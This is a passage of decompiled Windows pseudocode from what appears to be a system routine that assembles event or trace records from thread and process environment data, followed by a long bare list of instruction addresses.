											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E04B76DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E04B7F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E04B7F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E04B7F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E04B7FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E04B7FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E04B7F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E04B7F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E04C04CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E04B8D130(_t427, _t494, _t511);
				}
			}










































































                                                                                                                                    0x04c05ba5
                                                                                                                                    0x04c05baa
                                                                                                                                    0x04c05baf
                                                                                                                                    0x04c05bb4
                                                                                                                                    0x04c05bb6
                                                                                                                                    0x04c05bbc
                                                                                                                                    0x04c05bbe
                                                                                                                                    0x04c05bc4
                                                                                                                                    0x04c05bcd
                                                                                                                                    0x04c05bd3
                                                                                                                                    0x04c05bd6
                                                                                                                                    0x04c05bdc
                                                                                                                                    0x04c05be0
                                                                                                                                    0x04c05be3
                                                                                                                                    0x04c05beb
                                                                                                                                    0x04c05bf2
                                                                                                                                    0x04c05bf8
                                                                                                                                    0x04c05bfe
                                                                                                                                    0x04c05c04
                                                                                                                                    0x04c05c0e
                                                                                                                                    0x04c05c18
                                                                                                                                    0x04c05c1f
                                                                                                                                    0x04c05c25
                                                                                                                                    0x04c05c2a
                                                                                                                                    0x04c05c2c
                                                                                                                                    0x04c05c32
                                                                                                                                    0x04c05c3a
                                                                                                                                    0x04c05c3f
                                                                                                                                    0x04c05c42
                                                                                                                                    0x04c05c48
                                                                                                                                    0x04c05c5b
                                                                                                                                    0x04c05c5b
                                                                                                                                    0x04c05c2c
                                                                                                                                    0x04c05cb7
                                                                                                                                    0x04c05cb9
                                                                                                                                    0x04c05cbf
                                                                                                                                    0x04c05cc2
                                                                                                                                    0x04c05cca
                                                                                                                                    0x04c05ccb
                                                                                                                                    0x04c05ccb
                                                                                                                                    0x04c05cd1
                                                                                                                                    0x04c05cd7
                                                                                                                                    0x04c05cda
                                                                                                                                    0x04c05ce1
                                                                                                                                    0x04c05ce4
                                                                                                                                    0x04c05ce7
                                                                                                                                    0x04c05ced
                                                                                                                                    0x04c05cf3
                                                                                                                                    0x04c05cf9
                                                                                                                                    0x04c05cff
                                                                                                                                    0x04c05d08
                                                                                                                                    0x04c05d0a
                                                                                                                                    0x04c05d0e
                                                                                                                                    0x04c05d10
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04c05d16
                                                                                                                                    0x04c05d1a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04c05d20
                                                                                                                                    0x04c05d22
                                                                                                                                    0x04c05d25
                                                                                                                                    0x04c05d2f
                                                                                                                                    0x04c05d2f
                                                                                                                                    0x04c05d33
                                                                                                                                    0x04c05d3d
                                                                                                                                    0x04c05d49
                                                                                                                                    0x04c05d4b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04c05d5a
                                                                                                                                    0x04c05d5d
                                                                                                                                    0x04c05d60
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04c05d66
                                                                                                                                    0x04c05d69
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04c05d6f
                                                                                                                                    0x04c05d6f
                                                                                                                                    0x04c05d73
                                                                                                                                    0x04c05d79
                                                                                                                                    0x04c05d7f
                                                                                                                                    0x04c05d86
                                                                                                                                    0x04c05d95
                                                                                                                                    0x04c05d98
                                                                                                                                    0x04c05dba
                                                                                                                                    0x04c05dcb
                                                                                                                                    0x04c05dce
                                                                                                                                    0x04c05dd3
                                                                                                                                    0x04c05dd6
                                                                                                                                    0x04c05dd8
                                                                                                                                    0x04c05de6
                                                                                                                                    0x04c05dec
                                                                                                                                    0x04c05dee
                                                                                                                                    0x04c05df1
                                                                                                                                    0x04c05df3
                                                                                                                                    0x04c0635a
                                                                                                                                    0x04c0635a
                                                                                                                                    0x00000000
                                                                                                                                    0x04c0635a
                                                                                                                                    0x04c05dfe
                                                                                                                                    0x04c05e02
                                                                                                                                    0x04c05e05
                                                                                                                                    0x04c05e07
                                                                                                                                    0x04c05e10
                                                                                                                                    0x04c05e13
                                                                                                                                    0x04c05e1b
                                                                                                                                    0x04c05e1c
                                                                                                                                    0x04c05e21
                                                                                                                                    0x04c05e22
                                                                                                                                    0x04c05e23
                                                                                                                                    0x04c05e25
                                                                                                                                    0x04c05e2a
                                                                                                                                    0x04c05e2c
                                                                                                                                    0x04c05e2e
                                                                                                                                    0x04c05e36
                                                                                                                                    0x04c05e39
                                                                                                                                    0x04c05e42
                                                                                                                                    0x04c05e47
                                                                                                                                    0x04c05e4d
                                                                                                                                    0x04c05e54
                                                                                                                                    0x04c05e54
                                                                                                                                    0x04c05e54
                                                                                                                                    0x04c05e2e
                                                                                                                                    0x04c05e5c
                                                                                                                                    0x04c05e5f
                                                                                                                                    0x04c05e62
                                                                                                                                    0x04c05e64
                                                                                                                                    0x04c05e6b
                                                                                                                                    0x04c05e70
                                                                                                                                    0x04c05e7a
                                                                                                                                    0x04c05e7a
                                                                                                                                    0x04c05e7a
                                                                                                                                    0x04c05e6b
                                                                                                                                    0x04c05e7e
                                                                                                                                    0x04c05e7f
                                                                                                                                    0x04c05e7f
                                                                                                                                    0x04c05e81
                                                                                                                                    0x04c05e87
                                                                                                                                    0x04c05e8b
                                                                                                                                    0x04c05e8c
                                                                                                                                    0x04c05e8c
                                                                                                                                    0x04c05e8c
                                                                                                                                    0x04c05e9a
                                                                                                                                    0x04c05e9c
                                                                                                                                    0x04c05ea2
                                                                                                                                    0x04c05ea6
                                                                                                                                    0x04c05f50
                                                                                                                                    0x04c05f50
                                                                                                                                    0x04c05f57
                                                                                                                                    0x04c05f66
                                                                                                                                    0x04c05f66
                                                                                                                                    0x04c05f66
                                                                                                                                    0x04c05f68
                                                                                                                                    0x04c05f6a
                                                                                                                                    0x04c063d0
                                                                                                                                    0x00000000
                                                                                                                                    0x04c05f70
                                                                                                                                    0x04c05f70
                                                                                                                                    0x04c05f91
                                                                                                                                    0x04c05f9c
                                                                                                                                    0x04c05f9e
                                                                                                                                    0x04c05fa4
                                                                                                                                    0x04c05fa6
                                                                                                                                    0x04c0638c
                                                                                                                                    0x04c06392
                                                                                                                                    0x04c063a1
                                                                                                                                    0x04c063a7
                                                                                                                                    0x04c063af
                                                                                                                                    0x04c063af
                                                                                                                                    0x04c063bd
                                                                                                                                    0x04c063d8
                                                                                                                                    0x00000000
                                                                                                                                    0x04c063d8
                                                                                                                                    0x04c05fac
                                                                                                                                    0x04c05fb2
                                                                                                                                    0x04c05fb4
                                                                                                                                    0x04c05fbd
                                                                                                                                    0x04c05fc6
                                                                                                                                    0x04c05fce
                                                                                                                                    0x04c05fd4
                                                                                                                                    0x04c05fdc
                                                                                                                                    0x04c05fec
                                                                                                                                    0x04c05fed
                                                                                                                                    0x04c05fee
                                                                                                                                    0x04c05fef
                                                                                                                                    0x04c05ff9
                                                                                                                                    0x04c05ffa
                                                                                                                                    0x04c05ffb
                                                                                                                                    0x04c05ffc
                                                                                                                                    0x04c06000
                                                                                                                                    0x04c06004
                                                                                                                                    0x04c06012
                                                                                                                                    0x04c06012
                                                                                                                                    0x04c06018
                                                                                                                                    0x04c06019
                                                                                                                                    0x04c0601a
                                                                                                                                    0x04c0601b
                                                                                                                                    0x04c0601c
                                                                                                                                    0x04c06020
                                                                                                                                    0x04c06059
                                                                                                                                    0x04c0605c
                                                                                                                                    0x04c06061
                                                                                                                                    0x04c06061
                                                                                                                                    0x04c06022
                                                                                                                                    0x04c06022
                                                                                                                                    0x04c06022
                                                                                                                                    0x04c06025
                                                                                                                                    0x04c0602a
                                                                                                                                    0x04c0602b
                                                                                                                                    0x04c06031
                                                                                                                                    0x04c06037
                                                                                                                                    0x04c06038
                                                                                                                                    0x04c0603e
                                                                                                                                    0x04c06048
                                                                                                                                    0x04c06049
                                                                                                                                    0x04c0604a
                                                                                                                                    0x04c0604b
                                                                                                                                    0x04c0604c
                                                                                                                                    0x04c0604d
                                                                                                                                    0x04c06053
                                                                                                                                    0x04c06054
                                                                                                                                    0x04c06054
                                                                                                                                    0x04c06062
                                                                                                                                    0x04c06065
                                                                                                                                    0x04c06067
                                                                                                                                    0x04c0606a
                                                                                                                                    0x04c06070
                                                                                                                                    0x04c06075
                                                                                                                                    0x04c06076
                                                                                                                                    0x04c06081
                                                                                                                                    0x04c06087
                                                                                                                                    0x04c06095
                                                                                                                                    0x04c06099
                                                                                                                                    0x04c0609e
                                                                                                                                    0x04c060a4
                                                                                                                                    0x04c060ae
                                                                                                                                    0x04c060b0
                                                                                                                                    0x04c060b3
                                                                                                                                    0x04c060b6
                                                                                                                                    0x04c060b8
                                                                                                                                    0x04c060ba
                                                                                                                                    0x04c060ba
                                                                                                                                    0x04c060ba
                                                                                                                                    0x04c060ba
                                                                                                                                    0x04c060be
                                                                                                                                    0x04c060c0
                                                                                                                                    0x04c060c5
                                                                                                                                    0x04c060c5
                                                                                                                                    0x04c060c5
                                                                                                                                    0x04c060c6
                                                                                                                                    0x04c060cd
                                                                                                                                    0x04c06114
                                                                                                                                    0x04c060cf
                                                                                                                                    0x04c060cf
                                                                                                                                    0x04c060d4
                                                                                                                                    0x04c060d5
                                                                                                                                    0x04c060da
                                                                                                                                    0x04c060db
                                                                                                                                    0x04c060e1
                                                                                                                                    0x04c060e2
                                                                                                                                    0x04c060e8
                                                                                                                                    0x04c060f8
                                                                                                                                    0x04c060fd
                                                                                                                                    0x04c060fe
                                                                                                                                    0x04c06102
                                                                                                                                    0x04c06104
                                                                                                                                    0x04c06107
                                                                                                                                    0x04c06109
                                                                                                                                    0x04c0610b
                                                                                                                                    0x04c0610b
                                                                                                                                    0x04c0610b
                                                                                                                                    0x04c0610b
                                                                                                                                    0x04c0610f
                                                                                                                                    0x04c0610f
                                                                                                                                    0x04c06117
                                                                                                                                    0x04c0611a
                                                                                                                                    0x04c0611f
                                                                                                                                    0x04c06125
                                                                                                                                    0x04c06134
                                                                                                                                    0x04c06139
                                                                                                                                    0x04c0613f
                                                                                                                                    0x04c06146
                                                                                                                                    0x04c06148
                                                                                                                                    0x04c0614b
                                                                                                                                    0x04c0614d
                                                                                                                                    0x04c0614f
                                                                                                                                    0x04c0614f
                                                                                                                                    0x04c0614f
                                                                                                                                    0x04c0614f
                                                                                                                                    0x04c06153
                                                                                                                                    0x04c06159
                                                                                                                                    0x04c06159
                                                                                                                                    0x04c0615c
                                                                                                                                    0x04c06163
                                                                                                                                    0x04c06169
                                                                                                                                    0x04c0616c
                                                                                                                                    0x04c06172
                                                                                                                                    0x04c06181
                                                                                                                                    0x04c06186
                                                                                                                                    0x04c06187
                                                                                                                                    0x04c0618b
                                                                                                                                    0x04c06191
                                                                                                                                    0x04c06195
                                                                                                                                    0x04c061a3
                                                                                                                                    0x04c061bb
                                                                                                                                    0x04c061c0
                                                                                                                                    0x04c061c3
                                                                                                                                    0x04c061cc
                                                                                                                                    0x04c061d0
                                                                                                                                    0x04c061dc
                                                                                                                                    0x04c061de
                                                                                                                                    0x04c061e1
                                                                                                                                    0x04c061e4
                                                                                                                                    0x04c061e6
                                                                                                                                    0x04c061e8
                                                                                                                                    0x04c061e8
                                                                                                                                    0x04c061e8
                                                                                                                                    0x04c061e8
                                                                                                                                    0x04c061e6
                                                                                                                                    0x04c061ec
                                                                                                                                    0x04c061f3
                                                                                                                                    0x04c06203
                                                                                                                                    0x04c06209
                                                                                                                                    0x04c0620a
                                                                                                                                    0x04c06216
                                                                                                                                    0x04c0621d
                                                                                                                                    0x04c06227
                                                                                                                                    0x04c06241
                                                                                                                                    0x04c06246
                                                                                                                                    0x04c0624c
                                                                                                                                    0x04c06257
                                                                                                                                    0x04c06259
                                                                                                                                    0x04c0625c
                                                                                                                                    0x04c0625e
                                                                                                                                    0x04c06260
                                                                                                                                    0x04c06260
                                                                                                                                    0x04c06260
                                                                                                                                    0x04c06260
                                                                                                                                    0x04c0625e
                                                                                                                                    0x04c06264
                                                                                                                                    0x04c06267
                                                                                                                                    0x04c06269
                                                                                                                                    0x04c06315
                                                                                                                                    0x04c06315
                                                                                                                                    0x04c0631b
                                                                                                                                    0x04c0631e
                                                                                                                                    0x04c06324
                                                                                                                                    0x04c06327
                                                                                                                                    0x04c0632f
                                                                                                                                    0x04c06330
                                                                                                                                    0x04c06333
                                                                                                                                    0x04c0633a
                                                                                                                                    0x04c0633c
                                                                                                                                    0x04c06335
                                                                                                                                    0x04c06335
                                                                                                                                    0x04c06335
                                                                                                                                    0x04c0633f
                                                                                                                                    0x04c06342
                                                                                                                                    0x04c0634c
                                                                                                                                    0x04c06352
                                                                                                                                    0x04c06355
                                                                                                                                    0x04c06355
                                                                                                                                    0x04c06359
                                                                                                                                    0x00000000
                                                                                                                                    0x04c0626f
                                                                                                                                    0x04c06275
                                                                                                                                    0x04c06275
                                                                                                                                    0x04c06278
                                                                                                                                    0x04c0627e
                                                                                                                                    0x04c0627e
                                                                                                                                    0x04c06281
                                                                                                                                    0x04c06287
                                                                                                                                    0x04c0628d
                                                                                                                                    0x04c06298
                                                                                                                                    0x04c0629c
                                                                                                                                    0x04c062a2
                                                                                                                                    0x04c0629e
                                                                                                                                    0x04c0629e
                                                                                                                                    0x04c0629e
                                                                                                                                    0x04c062a7
                                                                                                                                    0x04c062a7
                                                                                                                                    0x04c062aa
                                                                                                                                    0x04c062b0
                                                                                                                                    0x04c062f0
                                                                                                                                    0x04c062f0
                                                                                                                                    0x04c062f2
                                                                                                                                    0x04c062f8
                                                                                                                                    0x04c062fd
                                                                                                                                    0x04c062b2
                                                                                                                                    0x04c062b2
                                                                                                                                    0x04c062b2
                                                                                                                                    0x04c062b5
                                                                                                                                    0x04c062dd
                                                                                                                                    0x04c062e2
                                                                                                                                    0x04c062e5
                                                                                                                                    0x04c062b7
                                                                                                                                    0x04c062b8
                                                                                                                                    0x04c062bb
                                                                                                                                    0x04c062bd
                                                                                                                                    0x04c062c0
                                                                                                                                    0x04c062c4
                                                                                                                                    0x04c062cd
                                                                                                                                    0x04c062cd
                                                                                                                                    0x04c062c0
                                                                                                                                    0x04c062bb
                                                                                                                                    0x04c062b5
                                                                                                                                    0x04c06302
                                                                                                                                    0x04c06303
                                                                                                                                    0x04c06305
                                                                                                                                    0x04c06305
                                                                                                                                    0x04c06305
                                                                                                                                    0x04c0630c
                                                                                                                                    0x04c0630c
                                                                                                                                    0x00000000
                                                                                                                                    0x04c0627e
                                                                                                                                    0x04c06269
                                                                                                                                    0x04c05eac
                                                                                                                                    0x04c05ebb
                                                                                                                                    0x04c05ebe
                                                                                                                                    0x04c05ecb
                                                                                                                                    0x04c05ecb
                                                                                                                                    0x04c05ece
                                                                                                                                    0x04c05ece
                                                                                                                                    0x04c05ed4
                                                                                                                                    0x04c05ed7
                                                                                                                                    0x04c05ed9
                                                                                                                                    0x04c05edb
                                                                                                                                    0x04c05edb
                                                                                                                                    0x04c05ee1
                                                                                                                                    0x04c05ee1
                                                                                                                                    0x04c05ee3
                                                                                                                                    0x04c05f20
                                                                                                                                    0x04c05f20
                                                                                                                                    0x04c05ee5
                                                                                                                                    0x04c05ee5
                                                                                                                                    0x04c05ee5
                                                                                                                                    0x04c05ee8
                                                                                                                                    0x04c05f11
                                                                                                                                    0x04c05f18
                                                                                                                                    0x04c05eea
                                                                                                                                    0x04c05eea
                                                                                                                                    0x04c05eed
                                                                                                                                    0x04c05ef2
                                                                                                                                    0x04c05ef8
                                                                                                                                    0x04c05efb
                                                                                                                                    0x04c05f0a
                                                                                                                                    0x04c05f0a
                                                                                                                                    0x04c05eed
                                                                                                                                    0x04c05ee8
                                                                                                                                    0x04c05f22
                                                                                                                                    0x04c05f28
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04c05f30
                                                                                                                                    0x04c05f31
                                                                                                                                    0x04c05f37
                                                                                                                                    0x04c05f3a
                                                                                                                                    0x04c05f3d
                                                                                                                                    0x04c05f44
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04c05f46
                                                                                                                                    0x04c05f48
                                                                                                                                    0x04c05f4d
                                                                                                                                    0x00000000
                                                                                                                                    0x04c05f4d
                                                                                                                                    0x04c05dda
                                                                                                                                    0x04c05ddf
                                                                                                                                    0x00000000
                                                                                                                                    0x04c05ddf
                                                                                                                                    0x04c05dd8
                                                                                                                                    0x04c05da7
                                                                                                                                    0x04c05da9
                                                                                                                                    0x04c05dac
                                                                                                                                    0x04c05dae
                                                                                                                                    0x00000000
                                                                                                                                    0x04c05db4
                                                                                                                                    0x04c05db4
                                                                                                                                    0x00000000
                                                                                                                                    0x04c05db4
                                                                                                                                    0x04c05dae
                                                                                                                                    0x04c05d88
                                                                                                                                    0x04c05d8d
                                                                                                                                    0x04c06363
                                                                                                                                    0x04c06369
                                                                                                                                    0x04c0636a
                                                                                                                                    0x04c06370
                                                                                                                                    0x04c06372
                                                                                                                                    0x04c0637a
                                                                                                                                    0x04c0637b
                                                                                                                                    0x04c0637d
